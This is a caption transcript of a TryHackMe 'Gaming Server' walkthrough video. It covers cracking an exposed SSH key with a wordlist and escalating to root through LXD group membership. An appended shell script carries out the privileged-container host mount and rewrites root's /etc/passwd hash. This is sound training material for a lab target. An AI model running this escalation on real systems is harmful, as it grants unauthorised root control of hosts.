TryHackMe GAMING SERVER - LXD Privilege Escalation

Video Statistics and Information

Captions
Hello everybody, my name is John Hammond and welcome back to another YouTube video. We're looking at some more TryHackMe, and this is a new room; it's been out for a few days now. I'm bummed because there are some write-ups out already, I didn't make it right to the punch, but this is going to be showcasing Gaming Server, which was a super fun room. Sure, its difficulty is rated easy, but I think there were some really cool nuggets in here, so I want to work through this with you. I have the IP address and the room already started, so let's go ahead and jump in. I'll start off like I always do by making a folder, a directory to work in for this room. Wow, we're already doing really, really well getting words and speech to happen. So I'm going to create a simple README file where I will just kind of keep track of my notes and things, and let's start off with a simple RustScan to kind of see what open ports we're working with. Looks like we have port 22 open and port 80 open, so that is good to know. I will go ahead and get started with some simple Nikto and DirBuster or Gobuster scans so we do some automatic enumeration kicking off in the background while we also do our own manual enumeration. So I'll start off with Nikto in that one window and I will start off with Gobuster in this window. I'll use dir as the option to make it work in directory mode, pass -u to specify the URL, and the wordlist that I'll use; I'll use the directory-list medium that typically ships with DirBuster. Okay, now we can go to some manual enumeration and poke around ourselves. This is the IP address; open it up in a web browser and I'm greeted with this dragon website, lorem ipsum. Okay, so there's not a whole lot of actual content here other than, I guess, some pages to access, just more lorem ipsum text nonsense. Is there a read more page? That link sends me to archive, this links me to about. I can see down the bottom left of my screen here "myths," and that takes me
nowhere. Okay, I will hit Ctrl+U just to kind of view the source here, kind of see if there's anything interesting in the HTML. I think that's always good practice, same thing with always checking out static files like the CSS and JavaScript; maybe, sure, you don't see anything like crazy cool in there, or it's boring in that it's a static file, it's not going to do anything dynamic, in the case of CSS specifically, but it's always, I think, good practice just to check in case they hide anything in there. Oh, and actually it's a good thing that we did. There's an HTML comment here: "john please add some actual content to the site lorem ipsum is horrible to look at". Great, this is awfully meta, they're talking to me, John. So maybe that's worthwhile, maybe that's going to be a username we could work with. Checking out those other pages, I'll zoom out here. I see the index page; that brings us to this archives page that's apparently just not a thing. What about that about.html? There's a video here that is not a video, incredible. And an uploads page. Oh, okay, so sorry, I don't know if that was visible with my face in the way: there's an uploads page that I can just click on and it took me to this location, /uploads, and that had some interesting files in there. I wonder if there's like an upload functionality that we could get into. There's a meme.jpg, which should obviously be the first thing that we look at. Thanks, that's great. manifesto.txt, oh, and this is just the Hacker Manifesto, very, very cool. It's a plain text file, so if I were to view the source there's nothing else in here. If you really, really wanted to, sure, you could slap it into a text editor and see if they're doing any tricks like hiding whitespace steganography or anything. Nothing there, so that's nothing we need to worry about, but kind of a nice little Easter egg if you're into the Hacker Manifesto. I like that, I dig that. And there's this dict.lst which seemingly looks like a wordlist or dictionary list for
potential passwords. I like this: like season and then year, that's kind of known now as a pretty common technique for passwords that you might be using, because you just look out the window and say oh, it's snowing outside, it's winter 2020 or whatever. So this would be worthwhile; let's go ahead and save this. I'm going to go back to my directory here and I'll wget this down. So that's downloaded, there we go, I have a dict.lst and all of those files there. We have Nikto's results here that found a robots.txt location, so let's hop over to robots.txt. I typed in "ribbit," okay. And that just tells me to look at this uploads directory that we were already in and pilfering out of. Cool, seemingly nothing else in there. DirBuster or Gobuster found uploads and also found secret. Oh, what is that? /secret, there we go. Okay, and that's in the directory listing with the secret key, and that is a private key. Okay, awesome, so let's totally wget that down as well. wget, grab that guy. And we knew that there was SSH open, right? Yeah, we saw that in our Nmap scan, or RustScan, which will funnel to Nmap, and we have a potential username, and we also have a potential password list, and we have this potential secret key. So I guess it's worth a try seeing if we can SSH into this machine. Let me grab that IP address, there we go, with the secret key, and specifying the host and john as the username. My username is john on my machine so I don't really need to supply that, but it's a good thing that I do, to be explicit, you know. Oh, and I need to mark that as our specific key, so chmod 600 so it has the permissions of just my user to be able to do that. There we go, now I can run that one more time, and that private key needs a password. Okay, so that's not a big deal; we know that we have a wordlist we could use, so let's run John the Ripper. I have John the Ripper downloaded and installed in my opt directory, that's where I tend to put all of my tools, so in their run folder there is an ssh2john
Python script that will allow you to take a private key and put it into a format that John the Ripper can handle, and then you could throw a wordlist at it and hopefully it could crack a password or figure something out. So let me run ssh2john on that secret key and I get this big, big, big amount of output, but that's going to put it in a format that John the Ripper can work with. So I will take that exact same command and I'll redirect it out to a file, like forjohn.txt. Okay, then I can just simply run John the Ripper on that forjohn.txt file that I just created, and I'll specify the wordlist we want to use as that dict.lst, was that the name of it? I'm just going to Ctrl+C to check. Yes, dict.lst. So run that guy and we'll see if he gets a password, and he does. Okay, so the password for that private key is "letmein." Great, so let's ssh -i with our secret key to john at that IP address, and that's on my clipboard, thank you. Enter passphrase, we know that has now let me in. Great. I should be taking notes on all this; I literally didn't, I created that readme.txt file, a README.md, and didn't do anything with it. So since we have initial access, since we are logged in as this john user, we're able to SSH in, we are now on the box and we can look at his home directory and we have this user.txt. So cat-ing that out, we can go submit that as the user flag. Great. Okay, now we'll want to do some usual manual or automated enumeration. I'll start with the immediate low-hanging fruit just to see, can I run sudo? And he needs a password, and we don't know his password; we only know the password for that private key, so that doesn't work. I could type in something like "please subscribe," but unfortunately that's not his password, but it is my password, so if you want to subscribe that might help, shameless plug. Now let's go actually do some automated enumeration, so I will go ahead and upload LinPEAS or an automatic enumeration script like LinPEAS or LinEnum. Lin-
PEAS is great and fantastic, so I will do that. I'll do that with my poor man's pentest style. All that's really doing is going to create one protocol or one kind of communication transfer setup. I could be using netcat to just listen on my attacker machine and send, or listen, excuse me, listen on the host, on the victim, and then maybe like send along the file, just cat it out to another network or netcat connection, and then it'll save it or pull it onto that file; I can redirect it out. Or you can do the same thing with wget, just to download a file; you can do the same thing with FTP or HTTP, do wget, right, or SMB, etc. Enough background, let's actually run the command again. I store LinPEAS in my opt directory, so let's slap that in and he's going to throw it in /dev/shm. Great. Let me just check, quick, it's good, so that's sent. I'm going to move into /dev/shm and I might still have some files in there from when I did this moments ago, so let me just run that one more time. Super sorry, ruined the illusion there, but now we've got LinPEAS. Let me mark that as executable, chmod +x, and I'll go ahead and run it and save that output. I'll just pipe it to tee so I can see the standard output and it'll be funneled into a file. So there we go. I do not have the entire LinPEAS script apparently. When this happens I just like to check with md5sum on the original file that's on the host and on my attacker machine. Yeah, those are different, so let me upload that one more time, slap that along, that's sent now. Now does the md5sum command give me the same hash? It does, okay, great. So let's actually run our LinPEAS script now. There we go, the beautiful peas that show up, and we're cranking through. I'll let this run for a little bit, but I will scroll up to the top and see what we can work with. I know reading LinPEAS output might be like weird and intimidating, and there's a lot to look through, obviously, if you kind of aren't familiar with it, especially knowing what's normal and what's not, so
thankfully LinPEAS does a really good job of giving you a legend or color coding as to what might be potentially useful. In this case, looks like we are running our operating system of Linux, that kernel version, and it's Ubuntu 18.04. I'm running as that john user and I'm in the sudo group, but I don't know his password, so I wasn't able to run sudo commands. I'm also in lxd, or LXD, which is a kind of technology used for creating containers, and Docker is like a similar tool. Maybe that's going to be an outlet; it looks like that is notified as, hey, this is a huge PE vector, you could potentially do some stuff with LXD. Let me tune into that later, but first let's continue scrolling through LinPEAS. Sudo version is seemingly old, maybe we could abuse that. CPU information, nothing sticks out; same thing in the environment, these are all just regular, normal environment variables. We can see here that we are ASLR enabled, or address space layout randomization; that might get in the way if we were to do some nifty, crazy binary exploitation stuff, but I don't think we need to do that in this case. Blah blah blah, all the processes that are running; www-data is the one that's actually running Apache right now, so that's the web server. Cron jobs: oftentimes we might see interesting backups or things that get in the way; looks like there's nothing out of the ordinary there. Same thing with services, nothing highlighted or enumerated. Blah blah blah, same thing in /etc/hosts, nothing out of the ordinary. Lots of running things. My user again, sudo is present and so is lxd. pkexec policy, maybe that's going to be something interesting. Looks like these are the only users here, so john, this user that I'm running as, and root are the only ones that have bin bash in the output of /etc/passwd, that's it. So okay, okay, okay, nothing immediately stands out. Yes, we know we have our private SSH key, we already got that. Nothing, nothing, nothing. SetUID binaries, see if there's anything
interesting, easy low-hanging fruit there. Nothing immediately stands out, again all the stuff is kind of normal; same thing with SetGID. Oh, interesting that we have Vim information, lxc cookies. Ah, okay, so maybe a little bit more pointing towards LXC and LXD. That's a lot of output, a lot of stuff, and we can move on. Okay, so now that that illusion is over, let's talk a little bit more about that LXC or LXD privesc. This is a thing, right? This is kind of well known and well documented, there is a lot of stuff on this. If I go check out this Exploit-DB entry, there's immediately kind of some option that we have here. This is a bash script, but it tells you, like, you have to do a little bit of stuff on your own attacker machine to be able to prep this. This will actually have you go download some tool and utility that'll allow you to actually build Alpine, like build an image or the framework for a container to run in LXC, right, that technology and software that will be able to run containers. The same thing that you might do when you're performing like a Docker privesc, because that is kind of a tight security thing; you have a lot of functionality when you're creating those and running those containers. You could potentially end up mapping the entire filesystem into the container, so you essentially could have root privileges, because you can modify things as root inside your container and that's going to still take effect on the actual filesystem that you've mounted, or you could just peruse the filesystem, which is something that we could do to actually find that root flag or become that root user. So that's going to be kind of interesting and kind of fun, we could do that. Looks like they're using this build-alpine script, so this is out of an original GitHub repository, so let me actually go to that and check it out. I'll go to github.com, slap in that location here. This will build an Alpine Linux image for us. Okay, so let's clone this and work with it. I am, oh, Nikto
found secret. Nice, Gobuster and Nikto both found secret. I don't think we need to do anything more with those because we already are on the box. So let's go ahead and git clone this guy, and looks like we just have this ./build-alpine. Can I run this build-alpine? "You must be run as root." Okay, let's do a little sudo here. Actually, before I do that, I want to at least present this good practice to you: if you know you're running a shell script as root, you should probably at least take a gander as to what it's doing, make sure it's not going to fork bomb or rm -rf or destroy things or completely clobber your machine with ransomware. Looking through this, and considering it's on GitHub and it's kind of a trusted thing, looks like it got a decent amount of stars and forks, a decent amount of contributors. You shouldn't, sure, practice: you shouldn't blindly sudo a shell script, especially like curling something or downloading an install script and just piping it to bash, that's also sometimes a bad idea. But okay, this looks totally fine, nothing, no rm -rf on my forward slash, removing my entire filesystem. Anyway, let's go ahead and sudo this guy. I'll type in my password now that I trust this and it'll go do its thing. This failed, so I don't know if you're going to have this exact same predicament, but when the script would run for me it would automatically select a mirror that wasn't a good mirror; it would either just hang or it would just kind of fail. So what this ends up doing is, if you kind of follow through that code, you'll notice it created a new rootfs folder in here, so I'm going to go into that and it just looks like a filesystem, right? It's the root filesystem. That script, though, that we opened up, when I look at the mirrors, let me Ctrl+F for "mirror" here: it's pulling it out of the root filesystem, usr/share, alpine mirrors, and MIRRORS.txt. So let me go ahead and cat that out; I don't need the forward slash in this case because I'm going to be
talking relative, not my absolute path. I have a lot of stuff in here, let me Sublime that out. Oh, and I actually used the real forward slash that time, so I'm just going to open this up in a text editor and I'm going to remove a lot of the mirrors until I know maybe one that will work and one that will actually download things. I'll just leave the top one in this case. Now I'll go ahead and run that script one more time, getting back to that parent directory; let's see if this will be able to download it properly. Okay, looks like it's moving, it's cruising along, and it's going to prepare this Alpine image for me. Awesome. Now in my current directory I have this big alpine.tar.gz file. Now we could go ahead and put this on the victim or target machine. Normally, sure, you could go ahead and create a container or an image with LXC or Docker and it'll just pull it down from the internet, but keep in mind these don't actually have internet, being inside of the TryHackMe network, inside of that VPN. I had a thought, and I was poking around with this when I was going through it live, or previously on my own, right, I thought like, well, this would be kind of cool and fun to just go ahead and create a SOCKS proxy or funnel my internet through my attacker into the victim and the target machine so that it would be able to download things. You can set like http_proxy and https_proxy and that might work; you can do that and then run commands with curl or wget and be able to interact with it natively, but I don't think LXC was able to pull down an image through that. Anyway, if you guys have any interest in that I could showcase a video where I'm putting together that SOCKS proxy and then using that on the victim, so the target and the reverse shell that you're working with, even if it doesn't have internet, you can basically run primitive commands like curl or wget and be able to access the internet. You can apt update or install Kali or whatever the heck you want, terminal parrot if you
like to meme and troll, that's a thing, and maybe we could do a video on that if you guys have an interest in that. Anyway, let's continue to do what we were doing. We've got this image created, and we have created this so that we don't need to use the internet; when LXC tries to create a container or an image from this it can just take it locally from this file. So let's go ahead and throw that on the box. What I'll do is I'll go ahead and set up a Python HTTP server, my IP address, so that I know, and so that, like, you know, in your case you'll grab your attacker machine's. Now that that's serving, this is going to end up being like another thing to download or get a file here. I'll use wget on the victim, and actually let me mark this as black so you know that's the victim; hopefully that's not too confusing. Grab on that port that we're serving this little tiny, tiny web server; let's go ahead and grab that Alpine image here that we've downloaded. Okay, so that's going to pull that all down. Looks like my web server saw the request, my face is in the way, and you can see the victim is downloading that right now. While that's going, let's go ahead and kind of take another look at what we can do to perform this privilege escalation. This script might do some peculiar things where it's going to import the file name that's supplied with an alias and try to initialize it; it'll try to create that Alpine image with the container name of privesc and it's going to set that security.privileged equals true, and try to add the victim, like the real target here, filesystem mounted inside of that container at /mnt/root so that it would be able to access it from inside the container. Kind of cool. Then we'll go ahead and start that and they'll go ahead and execute a command on there so we get access into it. What we could do is we could go ahead and try this; let me, I guess, grab this code, and on our attacker machine let's Sublime, like, oh, I'm in the Alpine server there, let's call this like
lxc-privesc or something .sh, slap that in, and let's move up a directory and run that exact same server. So now I can download this lxc-privesc on the victim, lxc-privesc.sh. Great, he's pulled that down, and let's try and mark that as executable, and now let's go ahead and try and run that script. Looks like we need to supply the file name, and we have this big, big Alpine image file now, so let's supply that with that -f argument. See if it created it; looks like it did. It listed all the images that we have here, we've just imported that one successfully, and we added that forward slash, note the victim filesystem, inside the container, and then we jumped into the context of the container because we executed privesc, and privesc is our container name, and sh to give us a simple shell here. So now that we kind of read through and understood what that script was doing, we are in the container and we can now go ahead and move around. So nothing in my current directory; I'm root, right, but I am root inside of this container. Remember, if I were to move up another directory, I can move into home and you won't see that john user; if I were to cat out /etc/passwd you won't see anything else, because we are inside this container and not the actual target, the original machine that we were in. But we had mounted the root filesystem in /mnt/root, so I could move in there and now I'm in the actual filesystem of the original target, of the real victim, and I can move into their root home directory because I have permission to do that now, and I could just grab that root.txt. Neat, very cool. That's how we could just take advantage and privesc on this box. Keep in mind, sure, you're only doing that in the context of the container, but since we have access to their filesystem, hooray, we completed the room, congratulations everybody. Since we have access to this filesystem we could modify that /etc/passwd and maybe change the password for the root user. Let me do that just to
see if it'll make some sense here. So I'm moving into /etc/passwd within this container; I'll cat out the current contents of passwd, you can see this john user there, and that's not me, that's that john user on the victim. So let me grab all of this data, I know it's gross, but I'll slap it into Sublime Text, and then on my host I'll go ahead and fire up Python. So I'm going to use Python so that I can import crypt, and crypt is going to end up being that same library that creates the password hashes in SHA format and stuff that's going to be used regularly inside of /etc/passwd or /etc/shadow. We could read /etc/shadow and maybe, I guess, sure, you could modify and change that, but I think doing it instead in passwd is just kind of easier and more sane. You can see john's password hash, and maybe, I guess, we could crack his password hash if we wanted to, because we still don't know his password, but we can go ahead and set one for root and that might be kind of cool. Let's finish what I was saying, sorry. Inside of Python we've imported crypt and now I could use crypt.crypt to calculate that hash, or the cryptographic value, for a specific password. I'll just set my password to "pleasesub," "please subscribe," and now that string that it returns back out to us is what we could use for the value of that root user. So let me patch this into where the x would be, and that's where normally you would see the password if you had that access to /etc/shadow. Now that that's created, what I'm going to do is I'm going to try and run nano inside of that target container, let me see if I can actually run nano or will it break. Nope, I don't have that, okay. Do I have echo? I probably do, so I'll use a little heredoc; I'll use cat up to end of file and then I'll pump that into /etc/passwd. Maybe I will break the machine if I mess this up, hopefully I don't. So now that I'm in that little midway intermediary prompt, I can just paste all this in and I will type in EOF to denote the end
of file. Great. Now I can cat out /etc/passwd and hopefully I didn't clobber or destroy it; looks like I was okay, and our root user now has a set password syntax in there. Great. So at this point hopefully I can break out of my container, okay, okay, and I can change user to root, and the password that I have set is "pleasesub." Did I fat-finger that? Oh no. Can I su bash? Well, I mean, su, "pleasesub," no. Okay, let's change the game here then. We could just totally easily change our, like, john, and that command that we ran here, lxc-privesc -f alpine, just to get that container back. There we go. Now let's cd into /etc/passwd, or cd /mnt/root, and let's change that to that john user. Oh goodness, grab that password, slap it in for the john user so I know it, or we could crack his password, we could kind of use whatever technique we wanted to. /etc/passwd, did I accidentally throw that into /etc/passwd? Is that why that didn't work? It is. Oh, you guys should have told me, you guys should have told me, maybe it was right all along and I'm just an idiot. Let's find out. Let's use our heredoc again, so cat EOF to passwd, and now I have that pre-planned password in for both root and john, so let me throw that in, end that with EOF. Great, now let's exit and I can trust that this should work. su, without it, "pleasesub," no. Okay, can I sudo bash? "pleasesub," what the, what? Okay, what does it say? What does a password look like on this box? What are you doing, dude? Oh no, it doesn't have my dollar sign sixes, because we're entering that in bash and bash is going to interpret those dollar signs as if they were variables, so this syntax is gone. Let's, all right, third time's a charm, third time's a charm, guys. Let's run it one more time, back in the container, let's include our backslashes. Is there anything else that was weird and funky there? Let me just grab this syntax and kind of put it side by side to test it. I had up to this position, is there something else missing? Oh, another, there's another dollar
sign there. Are there any other dollar signs, anything else that I'm missing? It doesn't look like it. If I miss it again then we'll go for four times a charm. How about that backslash, is that noted there? Or that's just a regular forward slash, that's not a concern. Okay, okay, now pretty please, pray to the demo gods, Kyle. Let's move into /mnt/root and move into that /etc page and let's do our heredoc, passwd, slap that bad boy in, to the classic EOF. Now let's cat out passwd and do a sanity check before we remove this thing. Now our dollar signs are in place; let me verify that this line is the exact same as it should be within Sublime Text. I'll remove our dollar signs and that line should be identical, so if I search for that, do I see it, with regex turned off? It is perfectly fine. Okay, great, now hopefully, clearing that out, once again a sanity check, cat-ing /etc/passwd, my dollar signs are present. Let me see if I can su and use the password "pleasesub"; I'm going to type that one more time to not fat-finger it. And I'm root! All right, awesome, thanks everybody. Now we're actually root on the actual host, target, victim, without needing to go through the container. That was a lot of fun. I hope you guys kind of enjoyed that. I know when I'm fumbling around and messing up at the very, very last part or whatever, people say, I personally think it's stupid and annoying and it's not fun to watch, but you guys say hey, it's really, really cool to actually see you rework and problem-solve and stuff like that, so I hope that was fun. Now we got the real root.txt, actually on the box, not through the container, so we did it, we finished that room, and I think that was a lot of fun. I don't have a whole lot of practice with some of those LXC privescs, and if we wanted to, sure, we could take a look at some of the walkthroughs that other folks would use, and that's a lot of the fun of doing this and learning, and see what other tools
people use. Looks like ffuf was in there, I'm sure some wfuzz, okay, and they're using the same sort of setup with that LXC. Yep, yep, yep, yep, yep, that's really neat, that's really cool, that's really fun. I like this room a lot. I don't do a lot with LXC containers, but it's very, very cool to see that privesc every now and again, man. The benefit of TryHackMe is that, hey, you can take a look at how other people solved it, and they're all about education and learning first, so if you ever want to take a look at the write-up, if you're banging your head against the wall for too long, that's an option. I dig it, I love it, sweet. Thank you so, so much everybody, thanks for watching, thanks for hanging out, it's been great. I'm late on getting a video out so I wanted to just, like, hey, let's run through this thing, and I hope it wasn't too bad being an easy room; maybe that LXC privesc was kind of neat, and there's a lot of documentation, a lot of resources and material out on that sort of thing, so please go Google around, please go practice, please go learn, and thanks so much for watching. If you guys did like this video please do those YouTube algorithm things, maybe smash that like button, maybe smush, boop or bonk that like button, leave a comment, subscribe, you know, I'd be super duper grateful, and that's enough for now. Thanks for watching everybody, I'll see you in the next video. Love you. [Music]
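The two steps the video walks through, the privileged LXD container with the host's root mounted at /mnt/root and then the /etc/passwd edit that took three tries because the `$6$...` hash kept getting expanded, as an added shell example. This is not the video's or the Exploit-DB script's code. It assumes the Alpine image built with build-alpine is already on the target as alpine.tar.gz, that lxc is installed and the current user is in the lxd group, and that a crypt-format hash (the video generated one on the attacker box with Python's crypt module) is passed in as a string. The /etc/passwd used to exercise the hash-writing functions is a constructed stand-in, not the target's real file, so that part runs offline.

```shell
#!/bin/sh
# Added example; not code from the video or from the Exploit-DB LXD script.
# Assumptions (not from the page): alpine.tar.gz is already on the target, the
# host root is mounted at /mnt/root inside the container, and the password hash
# is a crypt string such as "$6$salt$hash" produced beforehand, e.g. on the
# attacker box with: python3 -c 'import crypt; print(crypt.crypt("pleasesub"))'

set -e

# Step 1, on the target: import the image, create a privileged container, map
# the host's whole filesystem into it, and get a root shell inside. These are
# standard lxc CLI commands and only run where lxc exists. If lxc reports that
# there is no storage pool yet, "lxd init --auto" has to be run first.
lxd_privesc() {
    image="$1"              # e.g. ./alpine.tar.gz
    name="${2:-privesc}"    # container name, reused as the image alias
    lxc image import "$image" --alias "$name"
    lxc init "$name" "$name" -c security.privileged=true
    lxc config device add "$name" hostroot disk source=/ path=/mnt/root recursive=true
    lxc start "$name"
    lxc exec "$name" -- /bin/sh   # root inside; the host's / is under /mnt/root
}

# Constructed stand-in for the mounted host root (NOT the target's real file),
# so the passwd logic below can be run and checked offline.
make_fake_rootfs() {
    d=$(mktemp -d)
    mkdir -p "$d/etc"
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'john:x:1000:1000::/home/john:/bin/bash' > "$d/etc/passwd"
    printf '%s\n' "$d"
}

# Step 2 as first attempted in the video: the entry pasted into an unquoted
# here-doc. The shell expands "$6", "$saltsalt" and "$hashhash" as variables
# before the text reaches the file, so the stored field is not the hash you
# typed (here it collapses to an empty field) and su rejects the password.
write_root_hash_broken() {
    rootfs="$1"
    cat <<EOF > "$rootfs/etc/passwd"
root:$6$saltsalt$hashhash:0:0:root:/root:/bin/bash
john:x:1000:1000::/home/john:/bin/bash
EOF
}

# Step 2 done right: hand the hash over as data, never as shell text to be
# re-expanded. awk -v sets h to the variable's exact value, only root's second
# field changes, and every other account line is kept as it was.
write_root_hash() {
    rootfs="$1"
    hash="$2"
    tmp="$rootfs/etc/passwd.tmp"
    awk -F: -v OFS=: -v h="$hash" '$1 == "root" { $2 = h } { print }' \
        "$rootfs/etc/passwd" > "$tmp"
    mv "$tmp" "$rootfs/etc/passwd"
}

# The sanity check the video ended up doing by eye: print root's password field
# so the "$" signs can be confirmed before leaving the container.
root_field() {
    awk -F: '$1 == "root" { print $2 }' "$1/etc/passwd"
}
```

Inside the container the file to edit is /mnt/root/etc/passwd, not the container's own /etc/passwd (the first failed su in the video was caused by writing to the wrong one); `write_root_hash /mnt/root "$HASH"` followed by `root_field /mnt/root` covers both mistakes, and after `exit` the new password works with `su` on the host. Python's `crypt` module is deprecated and removed in 3.13, so on a newer attacker box generate the hash another way (for example `openssl passwd -6`).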
Info
Channel: John Hammond
Views: 114,114
Rating: 4.9511495 out of 5
Id: 58-145bvu_8
Length: 34min 49sec (2089 seconds)
Published: Tue Sep 01 2020